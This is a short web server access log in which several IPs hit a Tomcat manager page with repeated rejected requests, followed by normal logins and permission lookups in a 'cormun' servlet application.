52.171.39.178 - - [12/Aug/2024:16:02:31 -0300] "GET /manager/html HTTP/1.1" 401 2474
52.171.39.178 - - [12/Aug/2024:16:02:31 -0300] "GET /manager/html HTTP/1.1" 401 2474
52.171.39.178 - - [12/Aug/2024:16:02:32 -0300] "GET /manager/html HTTP/1.1" 401 2474
52.171.39.178 - - [12/Aug/2024:16:02:32 -0300] "GET /manager/html HTTP/1.1" 401 2474
52.171.39.178 - - [12/Aug/2024:16:02:32 -0300] "GET /manager/html HTTP/1.1" 401 2474
52.171.39.178 - - [12/Aug/2024:16:02:32 -0300] "GET /manager/html HTTP/1.1" 401 2474
52.171.39.178 - - [12/Aug/2024:16:02:33 -0300] "GET /manager/html HTTP/1.1" 401 2474
52.171.39.178 - - [12/Aug/2024:16:02:33 -0300] "GET /manager/html HTTP/1.1" 401 2474
52.171.39.178 - - [12/Aug/2024:16:02:33 -0300] "GET /manager/html HTTP/1.1" 401 2474
52.171.39.178 - - [12/Aug/2024:16:02:33 -0300] "GET /manager/html HTTP/1.1" 401 2474
46.105.97.78 - tomcat [12/Aug/2024:16:02:43 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:16:04:59 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.152.114 - - [12/Aug/2024:16:06:46 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 6022
190.171.152.114 - - [12/Aug/2024:16:06:46 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1735
190.171.152.114 - - [12/Aug/2024:16:07:00 -0300] "POST /cormun/servlet/hlogin?fd20db489317a91bd111471dafee5c12,gx-no-cache=1723489556836 HTTP/1.1" 200 90
190.171.152.114 - - [12/Aug/2024:16:07:00 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 950
190.171.152.114 - - [12/Aug/2024:16:07:00 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 13264
190.171.152.114 - - [12/Aug/2024:16:07:03 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7215
